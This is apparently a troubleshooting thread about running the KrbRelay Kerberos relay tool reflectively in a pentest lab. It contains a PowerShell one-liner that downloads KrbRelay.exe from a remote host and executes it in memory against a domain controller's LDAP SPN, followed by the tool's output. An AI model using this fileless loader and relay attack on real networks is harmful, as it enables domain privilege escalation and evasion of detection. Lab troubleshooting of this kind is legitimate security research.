Reflective load of KrbRelay

[codeitch]

While being able to successfully run KrbRelay.exe in my lab, it seems I cannot get a proper apReq when running the very same executable reflectively as in:

function KrbRelay{$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.49.76/KrbRelay.exe') 
$assem = [System.Reflection.Assembly]::Load($data) 
[KrbRelay.Program]::main([string[]]$args)};KrbRelay -spn ldap/dc01.prod.domain.com -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -session 2 -console

...giving me the output as follows:

[*] Relaying context: PROD\user
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAAAjgIfpxuBQndWJ0pjWjfYvA7AAADwN//8sy3o0GiUwWyIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[*] Forcing cross-session authentication
[*] Using CLSID: 90f18417-f0f1-484e-9d3c-59dceee5dbd8
[*] Spawning in session 2
[-] Recieved invalid apReq, exploit will fail
05000b0710000000da00320002000000d016d0160000000003000000000001004301000000000000c00000000000004600000000045d888aeb1cc9119fe808002b10486002000000010001004301000000000000c0000000000000460000000033057171babe37498319b5dbef9ccc3601000000020001004301000000000000c000000000000046000000002c1cb76c129840450300000000000000010000000a050000000000004e544c4d535350000100000097b208e2040004002e00000006000600280000000a00ba470000000f434c49454e5450524f44

Is there perhaps any reason for this inconsistency that I might be missing?

[gfctam]

Same issue in here. Seams is CoInitializeSecurity problem. Please refer to below link. https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/kerberos/kerberos-relay